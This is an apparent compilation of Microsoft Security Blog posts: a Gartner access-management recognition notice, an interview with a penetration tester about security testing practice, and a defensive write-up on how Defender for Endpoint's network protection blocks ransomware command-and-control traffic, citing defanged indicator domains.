To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft.

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner and Magic Quadrant are registered trademarks and service marks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Gartner, Magic Quadrant for Access Management, By Henrique Teixeira, Abhyuday Data, Michael Kelley, James Hoover, Brian Guthrie. 2 November 2022.

The post Microsoft named a Leader in 2022 Gartner® Magic Quadrant™ for Access Management for the 6th year appeared first on Microsoft Security Blog.

Identifying cyberthreats quickly with proactive security testing

November 3rd, 2022 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyberthreats. In the latest post of our Community Voices blog series, Microsoft Security Senior Product Marketing Manager Brooke Lynn Weenig talks with Matthew Hickey, Co-founder, Chief Executive Officer (CEO), and hacker of Hacker House. The thoughts below reflect Matthew’s views, not the views of Matthew’s employer, and are not legal advice. In this blog post, Matthew talks about application security.

Brooke: How did you get into cybersecurity?

Matthew: If your dad is a car mechanic, you grow up learning about cars. During the 1980s, my dad was super into computers. He used to go to my grandma’s school and bring home the computers prior to anyone really understanding what they were. These were the filing cabinet days and the days of carbon paper. Only very academic people and fringe technologists were interested in cybersecurity. When I was in high school, I had networks in my house with networked games. I started picking apart how the phone network worked and how internet access worked. My dad was supportive. He said, “If a 13-year-old kid can break into it, maybe we should not be using it.”

I pushed hard to get myself in front of as many people as I could and ended up working for a group from the National Computing Center. They had begun selling cybersecurity assurance services and penetration testing. I built a portfolio of my work publishing papers and showing people how computer systems were broken and how you could hack into them. At the time, you could not go to college and do cybersecurity. I dealt with a lot of rejection letters and a lot of people saying no and then I got my first job—that was 20 years ago. Now, I run my own company and I have written a book on the subject.

Brooke: What is most fascinating to you about cybersecurity?

Matthew: For me, it is the exciting element of offensive security testing. I take a low-privileged user on the system and say, “I want to make this user become a high-privileged user without authorization” and I will poke and probe my way through the system, testing all the boundaries and controls in place until I find ways to break it.

I began on an interesting journey; looking at things like state machines, where a computer will go through a lifecycle of a connection. When you connect your system to a server in the office, the computer will keep track of different states. For example, “Did you enter the right password?” and “Should it give you access?” I find these kinds of problems intellectually challenging and quite enjoyable.

Brooke: How do you help clients define and set goals for security control?

Matthew: There is a saying that this industry is run on fear, uncertainty, and doubt. I often ask clients: “If a hacker broke in tomorrow and had free rein of all your systems, what are you most concerned about?” We identify all the assets in the environment and their sensitive data and then review controls based on their concerns. Usually, they are most concerned about payment information and commercially sensitive information, or they are storing things that they perhaps should not have been storing, including credit card data and anything that could cause brand reputational damage.

It’s important to get board buy-in and foster a culture of cybersecurity in the organization and make it something that everybody in the company talks about regularly, like with phishing awareness.

Another key thing is to never punish the user. If they are at work and opening emails, that is what you are asking that person to do. Even the best cybersecurity professionals will click on a phishing link eventually. It’s human nature. These psychological lures are designed to get people to click on them. One of the most effective is a fake FedEx or UPS notification. Nine times out of 10, people will click on the link to track that parcel because they want to know. The attackers know our psychology and our natural human behaviors and how to get attacks through our radar in a way that does not alert us that we are being attacked. Proper cybersecurity in an organization takes human error into account.

Brooke: How do you reduce assessment times and identify threats faster?

Matthew: The MITRE ATT&CK® Framework has been massively advantageous. It is a spreadsheet-based approach to understanding how an attacker behaves in an environment and it stems back to a paper written by Lockheed Martin. Lockheed Martin and the defense sector obviously were big targets for advanced persistent threats and cyber-enabled economic espionage, where nation-state actors break into their systems to steal information for espionage purposes.

Lockheed Martin came up with what they call the cyber kill chain, a timeline of an attack that starts at the very point that the attacker starts their breach into the network to the end—where they have exfiltrated and stolen the information. They modeled this and identified that the earlier you stop the attacker along this kill chain, the better, because they must start over again. The further along the chain they are, stopping the attack will cost the attacker more resources in terms of time and exploits used.

MITRE then came up with tools, techniques, and procedures. You can look at the threats in your industry and the known behaviors of threats targeting your sectors and begin unit testing those individual items. Instead of running a six-month engagement where we break into the client’s environment and do all this stealthy stuff, like monitor your network, we test against the actual threats and against these component items. That narrows the time involved in assessment activities and they get the result quicker.

Brooke: At what stage do clients bring your organization into the process?

Matthew: We work with a whole range of different clients, including people who have already built their product and people who have started to build their product. These kinds of strategies are usually very effective against large organizations—multinational corporations and Fortune 500 companies.

If you want to be effective in cybersecurity, the costs need to be on the attackers. We encourage organizations to move away from this longstanding engagement model and instead focus on doing unit tests against the actual situations they face. We call them cyber preparedness drills. We mimic the attacker’s behavior utilizing tools we’ve built, like these items we have published on GitHub for User Account Control (UAC) bypass testing:

These types of common attacker behaviors should be well-detected and even better detected by Microsoft Defender than they were previously. Simply scripting, even if it’s in the PowerShell command shell or the .NET developer platform and creating standard individual tests for specific items in the ATT&CK® framework and running those as simulations gives you better results.

Brooke: What advice would you give to cybersecurity leaders on how to manage their budgets?

Matthew: There is a big push in the industry to do what is most interesting. Clients will say, “I want you to simulate a real attacker. I want the best hackers to throw everything you have at the system.” They want to spend a ton of money simulating a real attacker and I usually discover they have not covered any of the basics, like telemetry, alerting, or network defense.

It is easy to bring people on board, but if you have not looked at your environment and the basics, there is no point hiring a team to mimic your attacker and do a full six-month red team engagement. Your attacker is going to break into your network for free anyway, so you might as well focus on how you can use that budget to build better defenses to alert your team. So many companies do not know how many systems or databases they have, for instance. They do not have an accurate picture of what is happening in their environment. They look to the penetration testers who end up telling them more than they know about their network. 

Leaders should always ask: Do you have an accurate picture of the patch levels in your environment? If someone opens malware, can you see the events? Do you get the telemetry?

You could buy the best security system around and if it is getting 150 alerts a day but nobody is paying attention, it is useless because no one is going to ever act. When looking at your budget and how to spend it effectively, focus on granular engagement. When you hire a firm, hire one that has a good background and good understanding that can make effective use of that budget.

There are three approaches. There is a black box assessment methodology, where we know nothing about the environment, the target, or the target network. Then, you have a gray box methodology, where a client might share a little bit of information, such as what is given to a new starting staff member in an area where there is a high employee turnover rate. And third, there is a white box assessment, where they give us anything we want to know and we can see what they see. From our experience, you get the best results from white box assessments and from doing bite-sized exercises as your security provider is better informed and not reliant on guesswork achieved through the other two common methodologies.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Identifying cyberthreats quickly with proactive security testing appeared first on Microsoft Security Blog.

Stopping C2 communications in human-operated ransomware through network protection

November 3rd, 2022 No comments

Command-and-control (C2) servers are an essential part of ransomware, commodity, and nation-state attacks. They are used to control infected devices and perform malicious activities like downloading and launching payloads, controlling botnets, or commanding post-exploitation penetration frameworks to breach an organization as part of a ransomware attack. Blocking these communications can mitigate attacks, sometimes before they’re even started.

For example, one of the most impactful cyberattack trends today is human-operated ransomware attacks, which succeed through a combination of components, including leveraging C2 infrastructure. To gain initial access, human-operated ransomware attacks are often delivered via spear-phishing with malicious attachments that, once launched by the target, typically reach out to a C2 server to download instructions and run payloads. These payloads persist on the device and periodically reach out to a (usually) separate set of C2s, awaiting instructions and takeover by a human operator as part of ransomware-as-a-service. After the hands-on-keyboard transition, remote C2s are commonly used to control post-exploitation frameworks to initiate reconnaissance, elevate privileges, and move laterally within the network to achieve data exfiltration and mass file encryption.

A human-operated ransomware attack example highlighting C2 usage. The attacker begins with the initial access stage, followed by execution, the initial C2 connection, persistence, a beaconing C2 connection, a post-exploitation C2 connection that continues throughout the attack, leading to lateral movement, and the final impact stage.
Figure 1. Example of C2 usage across the stages of a human-operated ransomware attack

Ransomware has evolved from a pre-programmed commodity threat to a complex threat that’s human-driven, adaptive, and focused on a larger scale. These days, ransomware attacks go beyond encryption and usually involve significant data theft as well to maximize the potential harm to the target, therefore increasing their chances of receiving a higher payout. Attackers engage in double extortion, demanding victims either pay the ransom or stolen confidential information is leaked and encrypted data remains inaccessible. As such, successful ransomware attacks can have lasting, damaging impacts on targets.

As ransomware attacks continue to target various entities, including businesses, governments, critical infrastructure, educational institutions, and healthcare facilities, organizations much be prepared to defend networks against human-operated attacks and other sophisticated threats. Microsoft Defender for Endpoint’s updated network protection enables organizations to protect against these C2-based attacks by blocking any outbound traffic attempting to connect to malicious C2 servers, even if attackers manage to gain initial access to a device. Additionally, network protection is continuously informed by our integrated threat intelligence to identify active C2 infrastructure and uses machine learning models to quickly assess information on domains and IPs.

This blog details how the new C2 blocking capability in Microsoft Defender for Endpoint’s network protection works. We show examples of how network protection functions with other technologies in Microsoft Defender for Endpoint to deliver comprehensive protection against C2-based attacks. Lastly, we discuss how our threat research and use of advanced machine learning models inform network protection to intelligently block ransomware and C2-based attacks before widespread impact.

Network protection detecting C2 activity in various attacks

The following cases of human-operated ransomware attacks from our threat data and investigations show how the new C2 blocking capability in network protection stop attacks and, in some cases, could have prevented attacks much earlier.

Disrupting the ransomware attack chain

In early October 2022, we observed an attack leveraging the Raspberry Robin worm as the initial access vector. Upon launch by the user, the attack attempted to connect to the domain tddshht[.]com via HTTP using msiexec.exe to download a TrueBot payload. As part of these attacks, TrueBot is typically downloaded to a user’s local application data directory where Windows Management Instrumentation (WMI) is used to run the TrueBot DLL using rundll32. In this case, network protection was enabled in the environment and blocked the C2 communication from msiexec.exe to tddshht[.]com, which prevented TrueBot from being downloaded and launched, disrupting the attack.

In similar attacks on organizations originating from Raspberry Robin, we’ve seen TrueBot lead to Cobalt Strike for post-exploitation human-operated ransomware attacks. After launching TrueBot, we observed various follow-on actions, such as reconnaissance, persistence via scheduled tasks, and ransomware deployment.

Raspberry Robin malware launches the Windows Installer service and msiexec.exe sends C2 communications of HTTP, which is blocked by network protection, preventing the attack from progressing. The attack was disrupted before the C2 connected to the domain tddshht[.]com, when TrueBot would be downloaded and launched, followed by dropping a Cobalt Strike beacon that transfers to hands-on-keyboard attack and a Cobalt Strike C2 connection, leading to follow-on activities and ransomware deployment.
Figure 2. Raspberry Robin incident disrupted by network protection  

Stopping ransomware activity before it could wreak havoc

In another ransomware-related case from March 2022, Microsoft researchers discovered a LockBit ransomware attack that was successfully detected and blocked. LockBit is an encryptor payload leveraged by many different operators who specialize in the post-exploitation phase of the attack as part ransomware as a service. In this case, there were multiple security products in different segments of the environment, and we didn’t have visibility of the initial access vector. As the attackers moved laterally within the network, we observed the operator using the Cobalt Strike framework for the post-exploitation stages of the attack, using Remote Desktop Protocol (RDP) with Rclone for data exfiltration, and LockBit at the final encryption stage. The encryption attempt followed the exfiltration stage by just two hours.

Throughout the attack, Microsoft Defender for Endpoint proactively displayed repeated alerts for the targeted customer that an active hands-on-keyboard attacker was active on their network, as well as repeated Cobalt Strike activity alerts and suspicious behaviors. Microsoft Defender Antivirus’s behavior detections repeatedly alerted and blocked Cobalt Strike in addition to fully blocking the attack’s LockBit encryptor payload, preventing impact on the subset of the network that had onboarded to Microsoft Defender for Endpoint.

Prior to this attack, network protection had already flagged the Cobalt Strike C2 domain sikescomposites[.]com as malicious. Had network protection C2 protection been enabled across the organization, then the Cobalt Strike C2 server would have been automatically blocked – further disrupting this attack earlier in the attack chain and potentially preventing or delaying the data exfiltration impact of the attack.

The network protection intelligence on the C2 was sourced two weeks before the attack in February 2022 through expert intelligence from Microsoft Threat Intelligence Center (MSTIC) and also incriminated via Cobalt Strike configuration extraction monitoring. Microsoft Defender for Endpoint could have disrupted this LockBit attack much earlier had network protection been enabled. Moreover, even if the attacker used a different or new payload, network protection would have blocked the attack if it used the same C2 infrastructure. The diagram below illustrates the timeline of events in this ransomware incident.

Two weeks before the attack, Microsoft's threat intelligence research sent intelligence on the C2 domain to network protection. Between Days 1 and 3, the attacker started hands-on-keyboard activity, repeated alerts displayed in Defender for Endpoint and the domain C2 connection was repeatedly observed and flagged by network protection. On Day 4, the attacker performed data exfiltration, Microsoft Defender Antivirus blocked the attacker's encryption payload, and the attacker successfully encrypted one device after restoring LockBit from quarantine.
Figure 3. LockBit ransomware incident timeline

End-to-end protection against C2-based attacks

The range of protection capabilities in Microsoft Defender for Endpoint ensure our customers are provided with synchronous protection, integrated remediation, and actionable alerts against these C2-based attacks. The combination of technologies and features within Defender for Endpoint assures customers that their assets are adequately protected.

Network protection blocks any outbound traffic when an application attempts to connect to known malicious C2 and informs customers of the block.

The Microsoft 365 Defender portal's alerts page displaying two examples of blocked C2 activity via network protection.
Figure 4. Example of blocked C2 activity in the Microsoft 365 Defender portal

Network protection then sends this intelligence to Microsoft Defender Antivirus, which remediates the process against known malware that attempted the C2 connection. Customers are then notified of these actions on the Defender for Endpoint portal, where they can see the attack chain, follow remediation steps, or do further investigation.

Diagram displaying how network protection blocks C2 connections using reputation lookup, sending connection metadata to signature matching to remediate the process via Microsoft Defender Antivirus, ultimately allowing Microsoft Defender for Endpoint to generate alerts using its detection logic.
Figure 5. Alerts for investigation in the Microsoft Defender for Endpoint portal are generated through a combination of technologies to protect against C2-based attacks

Network protection uses a dynamic reputation database that stores information on IPs, domains, and URLs gathered from a wide range of sources including threat research, detonation, adversary tracking, memory scanning, and active C2 web scanning. These activities lead to identifying C2 servers operated by human-operated ransomware actors and botnet actors and discovering compromised IPs and domains associated with known nation-state actors.

Network protection is aided by machine learning models that incriminate IP addresses used for C2 by inspecting network traffic telemetry. These models are trained on an extensive data set and use a diverse feature set, including DNS records, prevalence, location, and associations with compromised files or domains. Our threat experts’ knowledge further helps refine these models, which are re-trained and redeployed daily to adapt to the ever-changing threat landscape.

Training data, including good and malicious C2 IP addresses, is used to train machine learning models in addition to using extracted feature sets to predict new C2 IPs. This information is sent to Microsoft Defender for Endpoint to block malicious connections, perform remediation, and generate alerts.
Figure 6. Machine learning pipeline to generate new intelligence to protect customers from C2-based attacks

Preventing C2-based attacks

Attackers often rely heavily on leveraging C2 communications to start and progress attacks, including human-operated ransomware attacks. C2 infrastructure enables attackers to control infected devices, perform malicious activities, and quickly adapt to their target environment in the pursuit of organizations’ valuable data and assets.

Breaking this link to C2 infrastructure disrupts attacks—either by stopping it completely or delaying its progression, allowing more time for the SOC to investigate and mitigate the intrusion. Microsoft Defender for Endpoint’s network protection capability identifies and blocks connections to C2 infrastructure used in human-operated ransomware attacks, leveraging techniques like machine learning and intelligent indicators of compromise (IOC) identification.

Microsoft customers can use the new C2 blocking capability to prevent malicious C2 IP and domain access by enabling network protection. Network protection examines network metadata to match them to threat-related patterns and determines the true nature of C2 connections. Enhanced by continuously fine-tuned machine learning models and constant threat intelligence updates, Microsoft Defender for Endpoint can take appropriate actions to block malicious C2 connections and stop malware from launching or propagating. Customers can also refer to our Tech community blog post for guidance on validating functionality and more information on C2 detection and remediation.

In addition to enabling network protection C2 blocking, it’s recommended to follow the general best practices to defend your network against human-operated ransomware attacks.

The post Stopping C2 communications in human-operated ransomware through network protection appeared first on Microsoft Security Blog.